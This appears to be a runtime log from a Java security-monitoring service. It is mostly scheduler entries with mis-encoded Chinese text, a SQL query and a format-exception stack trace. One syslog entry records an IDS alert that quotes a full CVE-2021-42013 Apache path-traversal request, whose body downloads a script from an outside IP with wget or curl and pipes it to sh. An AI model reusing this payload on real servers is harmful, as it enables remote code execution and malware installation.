2026-05-19 11:51:00.239 [log-processor-3] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:51:00.515 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_data ͳƵ 0 м¼
2026-05-19 11:51:00.516 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_alarm ͳƵ 0 м¼
2026-05-19 11:51:00.516 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - ϲҪµĹ0
2026-05-19 11:51:00.536 [log-processor-3] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:51:00.538 [scheduling-7] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:51:00.665 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - ǰ״̬Ĺ174
2026-05-19 11:51:00.665 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - ʼ£1741
2026-05-19 11:51:00.665 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - ʱɣ¹0ʱ652ms
2026-05-19 11:52:00.015 [scheduling-9] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:52:00.015 [log-processor-4] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:52:00.236 [scheduling-9] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:52:00.240 [log-processor-4] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:52:00.493 [scheduling-9] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:52:00.536 [log-processor-4] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:53:00.011 [log-processor-5] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:53:00.011 [scheduling-7] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:53:00.234 [scheduling-7] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:53:00.235 [log-processor-5] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:53:00.572 [scheduling-7] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:53:00.574 [log-processor-5] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:54:00.011 [log-processor-6] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:54:00.011 [scheduling-6] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:54:00.231 [scheduling-6] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:54:00.232 [log-processor-6] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:54:00.568 [scheduling-6] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:54:00.572 [log-processor-6] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:55:00.015 [log-processor-7] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:55:00.015 [scheduling-10] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:55:00.089 [scheduling-3] INFO c.c.service.DeviceStatsUpdateService - ʼִ豸ͳƸ...
2026-05-19 11:55:00.162 [log-processor-7] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:55:00.168 [scheduling-3] INFO c.c.service.DeviceStatsUpdateService - 豸ͳƸɣ0ʱ79ms
2026-05-19 11:55:00.168 [scheduling-3] INFO c.c.service.DeviceStatsUpdateService - ʼִɼ̽ʱ£ʱ: 2026-05-19T11:55:00.168
2026-05-19 11:55:00.168 [scheduling-3] INFO c.c.s.DeviceCollectTaskUpdateService - ʼɼʱǰʱ: 2026-05-19T11:55:00.168
2026-05-19 11:55:00.238 [scheduling-10] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:55:00.410 [log-processor-7] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:55:00.583 [scheduling-10] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:55:00.584 [scheduling-3] INFO c.c.s.DeviceCollectTaskUpdateService - ɣܼ: 48Ѹ: 1
2026-05-19 11:55:00.584 [scheduling-3] INFO c.c.service.DeviceStatsUpdateService - ɼ̽ʱɣʱ: 416ms
2026-05-19 11:56:00.003 [scheduling-2] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:56:00.003 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - ʼִзʱʱ䣺2026-05-19T11:56:00.003
2026-05-19 11:56:00.003 [log-processor-8] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:56:00.222 [log-processor-8] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:56:00.225 [scheduling-2] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:56:00.454 [scheduling-2] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:56:00.502 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_data ͳƵ 0 м¼
2026-05-19 11:56:00.502 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_alarm ͳƵ 0 м¼
2026-05-19 11:56:00.502 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - ϲҪµĹ0
2026-05-19 11:56:00.522 [log-processor-8] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:56:00.647 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - ǰ״̬Ĺ174
2026-05-19 11:56:00.647 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - ʼ£1741
2026-05-19 11:56:00.647 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - ʱɣ¹0ʱ644ms
2026-05-19 11:57:00.005 [scheduling-1] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:57:00.005 [log-processor-9] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:57:00.223 [scheduling-1] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:57:00.226 [log-processor-9] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:57:00.450 [scheduling-1] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:57:00.456 [log-processor-9] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:58:00.012 [scheduling-1] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:58:00.012 [log-processor-10] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:58:00.235 [log-processor-10] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:58:00.237 [scheduling-1] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:58:00.466 [scheduling-1] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:58:00.498 [log-processor-10] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:58:03.645 [scheduling-4] INFO c.c.s.RealtimeAnalysisScheduler - ִй: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, nextTime=2026-05-19T11:58, now=2026-05-19T11:58:03.419
2026-05-19 11:58:03.645 [scheduling-4] INFO c.c.s.impl.AnalysisRuleServiceImpl - ִʵʱ: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765
2026-05-19 11:58:04.096 [scheduling-4] INFO c.c.s.impl.RealtimeAnalysisEngine - ڲѯΧ: ڴС=10mѯʱ䷶Χ=[2026-05-19 11:48:00, 2026-05-19 11:58:00]
2026-05-19 11:58:04.097 [scheduling-4] INFO c.c.s.impl.RealtimeAnalysisEngine - ʼִʵʱ: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, batchNo=20260519115803797, windowType=tumble, dataStartTime=2026-05-19 11:48:00, dataEndTime=2026-05-19 11:58:00
2026-05-19 11:58:05.149 [scheduling-4] INFO c.c.s.impl.RealtimeAnalysisEngine - ɵSQL: SELECT src_ip AS attack_ip,
dest_ip AS victim_ip,
origin_event_name AS alarm_name,
ARRAY_AGG(DISTINCT src_port) AS attack_port,
ARRAY_AGG(DISTINCT dest_port) AS victim_port,
MAX(event_level) AS alarm_level,
MODE() WITHIN GROUP (ORDER BY dest_domain) AS dns_info,
MODE() WITHIN GROUP (ORDER BY origin_event_type) AS alarm_type,
COUNT(dest_ip) AS log_count,
MAX(attack_result) AS attack_result,
ARRAY_AGG(DISTINCT http_req_header) AS http_req_header,
ARRAY_AGG(DISTINCT http_req_body) AS http_req_body,
ARRAY_AGG(DISTINCT http_resp_header) AS http_resp_header,
ARRAY_AGG(DISTINCT http_resp_body) AS http_resp_body,
ARRAY_AGG(DISTINCT http_url) AS victim_web_url,
ARRAY_AGG(DISTINCT id) AS origin_log_ids,
MIN(log_time) AS log_start_at,
MAX(log_time) AS log_end_at,
ARRAY_AGG(DISTINCT device_id) AS device_id,
ARRAY_AGG(DISTINCT payload) AS payload,
TUMBLE(log_time, INTERVAL '10 MINUTE') AS window_time
FROM syslog_normal_alarm AS t
WHERE log_time >= '2026-05-19 11:48:00' AND log_time < '2026-05-19 11:58:00' AND src_ip != '127.0.0.1' AND event_level >= 1
GROUP BY src_ip, dest_ip, origin_event_name, TUMBLE(log_time, INTERVAL '10 MINUTE')
2026-05-19 11:58:05.606 [scheduling-4] INFO c.c.s.impl.RealtimeAnalysisEngine - ִгɹ: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, processedCount=0, alarmCount=0
2026-05-19 11:58:05.910 [scheduling-4] INFO c.c.s.i.RuleExecutionTimeServiceImpl - ¹´ִʱ䣬ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, windowType=tumble, nextExecuteTime=2026-05-19 12:08:00
2026-05-19 11:58:05.910 [scheduling-4] INFO c.c.s.RealtimeAnalysisScheduler - εִй: 1, : 0
2026-05-19 11:58:58.083 [http-nio-8089-exec-5] INFO com.controllers.SyslogPushController - յsyslog: SyslogRequest{ip='192.168.0.124', port=514, logContent='<128>May 02 20:05:46 2026 {"sendHostAddress":"192.168.101.251", "deviceAssetSubTypeId":"59", "machineCode":"000d484ba79b", "interfaceName":"eth2", "transProtocol":"TCP", "appProtocol":"http", "logSessionId":"2605022005460345601", "srcAddress":"192.168.101.1", "srcPort":"41614", "srcMacAddress":"90-F1-B0-FA-CD-2A", "destMacAddress":"FA-16-C0-A8-65-AD", "destAddress":"192.168.101.173", "destPort":"80", "vlanId":"0", "vxlanId":"0", "productVendorName":"", "deviceAddress":"192.168.101.251", "eventCount":"1", "deviceSendProductName":"APTսԤ", "deviceProductType":"ּϵͳ", "deviceName":"devicename", "deviceId":"0", "deviceVersion":"2.0.79.89080.260305_ruletag_2.0.31216.260424.1", "srcGeoCountry":"й", "srcGeoRegion":"", "srcGeoCity":"", "srcGeoLongitude":"114.156924", "srcGeoLatitude":"22.340151", "destGeoCountry":"й", "destGeoRegion":"", "destGeoCity":"", "destGeoLongitude":"114.156924", "destGeoLatitude":"22.340151", "direction":"11", "attackerAddress":"srcAddress", "victimAddress":"destAddress", "attackDirection":"1", "attacker":["192.168.101.1"], "victim":["192.168.101.173"], "srcSecurityZone":"outer", "destSecurityZone":"outer", "logType":"alert", "dataType":"ids", "dataSubType":"attackAlert", "deviceCat":"/IDS/Network", "catObject":"/Host/Application/Service", "catBehavior":"/Access", "catOutcome":"FAIL", "catTechnique":"/Exploit/DirectoryTraversal", "severity":"5", "catSignificance":"/Informational/Warning", "eventId":"2605022005460000360199631657902", "startTime":"2026-05-02 20:05:46", "endTime":"2026-05-02 20:05:46", "deviceReceiptTime":"2026-05-02 20:05:46", "collectorReceiptTime":"2026-05-02 20:05:46", "ruleId":"93008265", "ruleName":"Apache HTTP Server 2.4.49 ·Խ© (CVE-2021-42013)", "alarmType":"WEB->·", "ruleType":"/WebAttack/DirTraversal", "requestMethod":"POST", "requestUrlQuery":"/cgi-bin/../../../../../../../bin/sh", "requestUrl":"/cgi-bin/../../../../../../../bin/sh", "requestHeader":"POST /cgi-bin/../../../../../../../bin/sh HTTP/1.1<br/>Host: 43.255.55.45:80<br/>Upgrade-Insecure-Requests: 1<br/>Accept: */*<br/>User-Agent: libredtail-http<br/>Connection: keep-alive<br/>Content-Type: text/plain<br/>Content-Length: 123<br/>", "requestBody":"(wget --no-check-certificate -qO- https://125.135.169.171/sh || curl -sk https://125.135.169.171/sh) | sh -s apache.selfrep", "responseHeader":"HTTP/1.1 400 Bad Request<br/>Content-Type: text/html; charset=us-ascii<br/>Server: Microsoft-HTTPAPI/2.0<br/>Date: Sat, 02 May 2026 12:05:45 GMT<br/>Connection: close<br/>Content-Length: 324<br/>", "responseMsg":"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"><br/><HTML><HEAD><TITLE>Bad Request</TITLE><br/><META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD><br/><BODY><h2>Bad Request - Invalid URL</h2><br/><hr><p>HTTP Error 400. The request URL is invalid.</p><br/></BODY></HTML><br/>", "responseCode":"400", "destHostName":"43.255.55.45:80", "name":"Apache HTTP Server 2.4.49 ·Խ© (CVE-2021-42013)", "cve":"CVE-2021-42013", "txId":"0", "confidence":"High", "httpVersion":"HTTP/1.1", "accessAgent":"libredtail-http", "attackStage":"1", "attackStatus":"3", "pcapRecord":"true", "tacticId":"TA0001", "techniquesId":"T1190", "isAPT":"false", "killChain":"KC_Exploitation", "message":"Apache HTTP Server 2.4.49 ·Խ© (CVE-2021-42013). Դ192.168.101.1/41614, Ŀģ192.168.101.173/80"}', protocol='TCP', facility='USER', severity='INFO'}
2026-05-19 11:58:58.084 [http-nio-8089-exec-5] INFO com.common.service.SyslogService - ʼsyslogϢ: IP=192.168.0.124, Port=514
2026-05-19 11:58:58.085 [http-nio-8089-exec-5] INFO com.common.service.SyslogService - TCP SyslogϢͳɹ: 192.168.0.124:514
2026-05-19 11:58:58.085 [http-nio-8089-exec-5] INFO com.controllers.SyslogPushController - SyslogϢͳɹ: IP=192.168.0.124, Port=514
2026-05-19 11:59:00.007 [scheduling-2] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:59:00.007 [log-processor-1] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:59:00.157 [scheduling-2] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:59:00.231 [log-processor-1] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:59:00.827 [scheduling-2] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:59:00.842 [log-processor-1] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:00:00.011 [scheduling-1] INFO c.c.s.ProbeStatusCheckScheduler - ========== ʼ̽״̬ ==========
2026-05-19 12:00:00.011 [scheduling-8] INFO c.c.s.AlarmHealthCheckScheduler - ========== ʼִи澯 ==========
2026-05-19 12:00:00.011 [scheduling-3] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:00:00.011 [log-processor-2] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:00:00.083 [scheduling-4] INFO c.c.service.DeviceStatsUpdateService - ʼִ豸ͳƸ...
2026-05-19 12:00:00.236 [log-processor-2] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:00:00.236 [scheduling-1] INFO c.c.s.ProbeStatusCheckScheduler - ̽״̬ɣ̽, ʱ: 225ms
2026-05-19 12:00:00.236 [scheduling-8] INFO c.c.service.AlarmHealthCheckService - alarm_20260519 : 4Сʱ=0, ״̬=
2026-05-19 12:00:00.238 [scheduling-8] ERROR c.c.s.AlarmHealthCheckScheduler - ִ쳣: d != java.lang.String
java.util.IllegalFormatConversionException: d != java.lang.String
at java.util.Formatter$FormatSpecifier.failConversion(Formatter.java:4302)
at java.util.Formatter$FormatSpecifier.printInteger(Formatter.java:2793)
at java.util.Formatter$FormatSpecifier.print(Formatter.java:2747)
at java.util.Formatter.format(Formatter.java:2520)
at java.util.Formatter.format(Formatter.java:2455)
at java.lang.String.format(String.java:2940)
at com.common.service.AlarmHealthCheckService.generateAlarmNotification(AlarmHealthCheckService.java:119)
at com.common.service.AlarmHealthCheckService.performHealthCheck(AlarmHealthCheckService.java:48)
at com.common.schedule.AlarmHealthCheckScheduler.scheduledHealthCheck(AlarmHealthCheckScheduler.java:32)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.springframework.scheduling.support.ScheduledMethodRunnable.run(ScheduledMethodRunnable.java:84)
at org.springframework.scheduling.support.DelegatingErrorHandlingRunnable.run(DelegatingErrorHandlingRunnable.java:54)
at org.springframework.scheduling.concurrent.ReschedulingRunnable.run(ReschedulingRunnable.java:95)
at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201(ScheduledThreadPoolExecutor.java:180)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:293)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)
2026-05-19 12:00:00.238 [scheduling-8] INFO c.c.s.AlarmHealthCheckScheduler - ========== ==========
2026-05-19 12:00:00.240 [scheduling-3] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:00:00.247 [scheduling-4] INFO c.c.service.DeviceStatsUpdateService - 豸ͳƸɣ1ʱ164ms
2026-05-19 12:00:00.247 [scheduling-4] INFO c.c.service.DeviceStatsUpdateService - ʼִɼ̽ʱ£ʱ: 2026-05-19T12:00:00.247
2026-05-19 12:00:00.247 [scheduling-4] INFO c.c.s.DeviceCollectTaskUpdateService - ʼɼʱǰʱ: 2026-05-19T12:00:00.247
2026-05-19 12:00:00.385 [scheduling-1] INFO c.c.s.ProbeStatusCheckScheduler - ̽ͳ: =1, =1, =0
2026-05-19 12:00:00.385 [scheduling-1] INFO c.c.s.ProbeStatusCheckScheduler - ========== ̽״̬ ==========
2026-05-19 12:00:00.649 [scheduling-4] INFO c.c.s.DeviceCollectTaskUpdateService - ɣܼ: 48Ѹ: 1
2026-05-19 12:00:00.649 [scheduling-4] INFO c.c.service.DeviceStatsUpdateService - ɼ̽ʱɣʱ: 402ms
2026-05-19 12:00:00.851 [scheduling-3] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:00:00.851 [log-processor-2] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:01:00.007 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - ʼִзʱʱ䣺2026-05-19T12:01:00.007
2026-05-19 12:01:00.007 [scheduling-2] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:01:00.007 [log-processor-3] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:01:00.230 [log-processor-3] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:01:00.231 [scheduling-2] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:01:00.470 [scheduling-2] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:01:00.662 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_data ͳƵ 0 м¼
2026-05-19 12:01:00.662 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_alarm ͳƵ 0 м¼
2026-05-19 12:01:00.662 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - ϲҪµĹ0
2026-05-19 12:01:00.808 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - ǰ״̬Ĺ174
2026-05-19 12:01:00.808 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - ʼ£1741
2026-05-19 12:01:00.808 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - ʱɣ¹0ʱ801ms
2026-05-19 12:01:00.857 [log-processor-3] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:02:00.011 [scheduling-7] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:02:00.011 [log-processor-4] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:02:00.232 [scheduling-7] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:02:00.234 [log-processor-4] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:02:00.472 [scheduling-7] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:02:00.482 [log-processor-4] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:03:00.011 [scheduling-5] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:03:00.011 [log-processor-5] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:03:00.234 [log-processor-5] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:03:00.235 [scheduling-5] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:03:00.491 [log-processor-5] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:03:00.501 [scheduling-5] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:04:00.011 [log-processor-6] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:04:00.011 [scheduling-6] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:04:00.232 [log-processor-6] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:04:00.234 [scheduling-6] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:04:00.490 [log-processor-6] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:04:00.498 [scheduling-6] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:05:00.012 [scheduling-3] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:05:00.012 [log-processor-7] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:05:00.086 [scheduling-2] INFO c.c.service.DeviceStatsUpdateService - ʼִ豸ͳƸ...
2026-05-19 12:05:00.229 [log-processor-7] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:05:00.244 [scheduling-2] INFO c.c.service.DeviceStatsUpdateService - 豸ͳƸɣ1ʱ158ms
2026-05-19 12:05:00.244 [scheduling-2] INFO c.c.service.DeviceStatsUpdateService - ʼִɼ̽ʱ£ʱ: 2026-05-19T12:05:00.244
2026-05-19 12:05:00.244 [scheduling-2] INFO c.c.s.DeviceCollectTaskUpdateService - ʼɼʱǰʱ: 2026-05-19T12:05:00.244
2026-05-19 12:05:00.245 [scheduling-3] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:05:00.483 [log-processor-7] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:05:00.496 [scheduling-3] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:05:00.678 [scheduling-2] INFO c.c.s.DeviceCollectTaskUpdateService - ɣܼ: 48Ѹ: 1
2026-05-19 12:05:00.678 [scheduling-2] INFO c.c.service.DeviceStatsUpdateService - ɼ̽ʱɣʱ: 434ms
2026-05-19 12:06:00.003 [scheduling-7] INFO c.c.s.NormalizeRuleHitTimeService - ʼִзʱʱ䣺2026-05-19T12:06:00.003
2026-05-19 12:06:00.003 [scheduling-9] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:06:00.003 [log-processor-8] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:06:00.219 [scheduling-9] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:06:00.227 [log-processor-8] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:06:00.497 [log-processor-8] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:06:00.511 [scheduling-9] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:06:00.710 [scheduling-7] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_data ͳƵ 0 м¼
2026-05-19 12:06:00.710 [scheduling-7] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_alarm ͳƵ 0 м¼
2026-05-19 12:06:00.710 [scheduling-7] INFO c.c.s.NormalizeRuleHitTimeService - ϲҪµĹ0
2026-05-19 12:06:00.866 [scheduling-7] INFO c.c.s.NormalizeRuleHitTimeService - ǰ״̬Ĺ174
2026-05-19 12:06:00.866 [scheduling-7] INFO c.c.s.NormalizeRuleHitTimeService - ʼ£1741
2026-05-19 12:06:00.866 [scheduling-7] INFO c.c.s.NormalizeRuleHitTimeService - ʱɣ¹0ʱ863ms
2026-05-19 12:07:00.014 [scheduling-8] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:07:00.014 [log-processor-9] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:07:00.240 [log-processor-9] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:07:00.245 [scheduling-8] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:07:00.510 [scheduling-8] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:07:00.537 [log-processor-9] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 12:31:44.951 [scheduling-1] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:31:44.951 [scheduling-10] INFO c.c.s.ProbeStatusCheckScheduler - ========== ʼ̽״̬ ==========
2026-05-19 12:31:44.952 [scheduling-2] INFO c.c.s.AlarmHealthCheckScheduler - ========== ʼִи澯 ==========
2026-05-19 12:31:44.952 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - ʼִзʱʱ䣺2026-05-19T12:31:44.952
2026-05-19 12:31:44.953 [log-processor-10] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:31:45.147 [scheduling-3] WARN com.zaxxer.hikari.pool.PoolBase - HikariPool-SyslogConsumer - Failed to validate connection org.postgresql.jdbc.PgConnection@69700c78 (This connection has been closed.). Possibly consider using a shorter maxLifetime value.
2026-05-19 12:31:45.147 [scheduling-4] WARN com.zaxxer.hikari.pool.PoolBase - HikariPool-SyslogConsumer - Failed to validate connection org.postgresql.jdbc.PgConnection@1a3b07de (This connection has been closed.). Possibly consider using a shorter maxLifetime value.
2026-05-19 12:31:45.147 [scheduling-2] WARN com.zaxxer.hikari.pool.PoolBase - HikariPool-SyslogConsumer - Failed to validate connection org.postgresql.jdbc.PgConnection@5c5bdb82 (This connection has been closed.). Possibly consider using a shorter maxLifetime value.
2026-05-19 12:31:45.147 [scheduling-10] WARN com.zaxxer.hikari.pool.PoolBase - HikariPool-SyslogConsumer - Failed to validate connection org.postgresql.jdbc.PgConnection@64844fec (This connection has been closed.). Possibly consider using a shorter maxLifetime value.
2026-05-19 12:31:45.148 [scheduling-1] WARN com.zaxxer.hikari.pool.PoolBase - HikariPool-SyslogConsumer - Failed to validate connection org.postgresql.jdbc.PgConnection@5931135b (This connection has been closed.). Possibly consider using a shorter maxLifetime value.
2026-05-19 12:31:45.162 [scheduling-5] WARN com.zaxxer.hikari.pool.PoolBase - HikariPool-SyslogConsumer - Failed to validate connection org.postgresql.jdbc.PgConnection@5fe0d99 (This connection has been closed.). Possibly consider using a shorter maxLifetime value.
2026-05-19 12:31:45.829 [log-processor-10] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:31:46.151 [scheduling-2] INFO c.c.service.AlarmHealthCheckService - alarm_20260519 : 4Сʱ=0, ״̬=
2026-05-19 12:31:46.152 [scheduling-2] ERROR c.c.s.AlarmHealthCheckScheduler - ִ쳣: d != java.lang.String
java.util.IllegalFormatConversionException: d != java.lang.String
